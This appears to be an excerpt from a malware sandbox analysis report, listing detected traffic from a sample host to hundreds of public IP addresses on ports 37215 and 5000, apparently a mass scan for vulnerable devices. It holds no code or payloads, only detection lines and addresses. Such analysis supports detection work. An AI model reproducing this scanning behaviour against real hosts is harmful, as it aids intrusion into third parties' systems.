                  Source: unknownNetwork traffic detected: HTTP traffic on port 41410 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42870 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48132 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33214 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36768 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54342 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59732 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46844 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53526 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55388 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56566 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42010 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33080 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51412 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43166 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44570 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58858 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41198 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47438 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34704 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46144 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43514 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36002 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35360 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59730 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35220 -> 37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.233.213.23:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.8.45.235:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.190.231.229:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.174.73.168:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.134.93.225:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.71.63.179:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.204.232.11:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.5.249.164:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.52.181.205:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 125.39.64.172:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.26.3.225:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.48.229.175:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 171.128.195.137:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.236.232.103:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.19.87.80:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 210.21.110.251:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 95.51.118.14:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.10.89.64:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.80.154.10:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.70.199.121:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 219.72.118.94:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.242.248.238:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.178.199.181:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.212.168.33:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.5.82.148:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.29.9.130:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.225.238.55:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 14.126.26.250:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.68.57.166:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 221.191.119.202:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.23.38.169:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.211.212.8:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.83.244.91:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 221.104.140.125:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.77.24.89:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 46.225.21.207:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.30.137.212:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 46.221.220.195:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.185.35.87:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 173.121.75.210:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.52.39.17:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 125.79.62.244:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.212.90.236:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 158.13.46.18:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 77.76.169.184:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 164.106.102.194:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.227.252.63:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.209.178.18:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.174.164.182:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.215.53.253:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.60.100.141:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 186.184.213.120:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.158.61.103:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.189.126.251:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 89.92.141.49:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.29.115.65:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.160.40.71:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 37.145.73.193:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.195.22.236:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 153.104.213.89:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.144.212.156:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.243.201.47:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.5.208.61:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.216.51.31:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.189.159.169:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.140.67.38:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.29.80.97:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.51.85.78:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.160.52.78:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.15.8.197:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.241.125.74:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.238.249.245:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.155.92.145:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.102.180.139:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.36.102.72:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.61.150.149:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 195.37.174.200:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 95.129.116.158:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.135.80.174:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.152.213.148:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.255.193.204:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.132.201.193:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 83.156.17.59:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.203.62.242:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.152.230.54:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 185.174.105.50:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.192.67.145:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.181.35.159:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.175.199.189:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.235.93.64:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.174.151.32:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.16.184.209:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 32.202.29.246:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.254.159.206:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 5.96.24.64:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.107.22.161:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.117.164.47:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.23.163.14:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.76.109.70:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 17.179.142.78:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.216.54.185:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.118.62.90:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.45.163.77:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.2.240.85:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.144.214.203:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.12.119.99:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 90.7.62.50:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.37.236.98:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 115.183.79.252:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 139.13.35.184:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.251.154.46:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 90.185.86.151:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 101.129.97.51:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.115.148.8:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.50.56.249:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.57.176.135:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.45.3.44:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 96.209.118.195:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.158.255.222:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.235.118.49:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 152.57.176.37:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 87.230.214.90:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.54.151.14:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.159.156.241:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.197.151.231:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.202.196.183:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.196.126.1:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.203.156.249:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.99.215.32:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 193.130.43.8:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.180.19.148:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 73.111.130.134:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 131.142.45.223:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.186.174.45:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 74.101.176.184:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 111.12.69.255:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.94.171.151:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.60.86.29:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.252.253.87:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.122.12.150:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.119.94.143:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.195.201.212:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 132.170.141.1:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.225.60.127:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.144.237.122:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.11.143.75:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.206.168.234:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.135.92.102:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 169.11.165.80:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.233.44.35:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.72.125.10:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.202.85.97:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.88.81.225:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 203.251.133.172:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 25.174.195.250:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.174.69.222:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.170.114.69:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 150.44.188.59:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 2.247.127.226:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.207.152.192:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.18.47.98:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.211.79.230:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.124.97.184:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.202.16.206:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.36.60.196:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.207.251.197:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.102.74.35:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 163.137.150.13:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.227.245.236:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.52.106.126:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.149.109.197:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.125.52.233:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.54.19.143:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.230.47.191:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.130.72.223:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.89.167.115:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.95.25.90:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.192.152.68:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 122.166.54.208:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.176.51.125:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 17.164.25.82:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.25.76.89:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.57.46.186:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.252.143.198:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.215.252.74:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.1.113.95:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.212.175.192:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.22.72.60:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.211.47.10:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.162.112.87:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.65.39.223:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.223.176.239:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.104.233.39:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 5.144.117.21:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.110.49.48:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.28.174.126:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.101.215.139:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 174.114.227.250:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 18.58.222.60:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.52.65.140:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.18.59.22:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 177.47.141.82:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.206.94.122:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.98.197.150:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 66.8.227.125:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.170.150.68:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.28.70.64:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.205.9.247:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 57.42.140.234:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.250.95.47:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 53.9.34.11:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.166.240.115:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.147.145.189:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 208.150.203.118:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 130.62.248.59:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.118.12.121:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 131.113.70.225:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 81.152.255.200:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.47.32.31:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.192.197.140:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 43.55.160.180:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.52.41.106:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.119.190.155:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 24.171.242.11:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.4.186.141:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.3.233.57:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 146.243.107.252:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.64.69.227:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.183.59.240:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.116.96.172:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 195.170.1.247:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.154.255.174:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.149.98.103:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.144.158.209:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.121.103.36:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 145.170.85.227:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 123.136.248.253:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.5.103.111:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 86.154.79.29:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 185.164.141.71:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.175.114.73:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.68.28.54:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.41.180.116:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 206.104.18.133:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.21.90.246:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.214.68.20:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 184.60.128.24:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.224.239.253:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 135.145.13.232:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 41.255.37.5:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 157.72.66.3:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.198.16.171:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 197.223.150.229:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 124.241.189.58:37215
                  Source: global trafficTCP traffic: 192.168.2.14:47083 -> 46.209.16.230:37215
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.32.165.175:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.63.136.48:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.242.178.175:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.96.207.168:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.62.246.145:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.204.165.190:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.99.124.148:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.31.243.23:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.87.199.126:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.43.12.177:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.23.9.57:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.22.205.247:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.196.165.24:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.145.32.60:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.77.143.57:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.24.77.188:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.250.63.136:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.170.38.105:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.220.194.111:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.72.91.0:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.86.96.210:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.219.2.156:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.219.25.93:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.55.32.185:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.190.220.227:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.245.64.163:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.149.215.249:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.48.136.37:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.137.200.168:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.60.246.244:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.177.149.196:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.232.24.44:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.21.44.245:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.173.173.6:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.203.200.213:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.38.179.111:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.90.129.39:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.163.223.25:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.91.5.102:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.246.39.155:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.116.83.199:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.230.200.66:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.167.96.239:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.109.239.189:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.69.104.173:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.77.167.114:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.247.38.111:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.71.149.3:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.46.107.127:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.243.154.203:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.225.204.193:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.85.97.87:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.109.197.126:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.70.10.73:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.149.49.75:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.66.146.235:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.158.225.205:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.200.34.171:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.12.207.108:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.89.57.243:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.29.186.247:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.172.240.96:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.63.100.253:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.8.93.235:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.62.105.71:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.225.79.20:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.113.128.138:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.187.47.169:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.101.142.88:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.134.171.239:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.11.61.5:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.5.175.212:5000
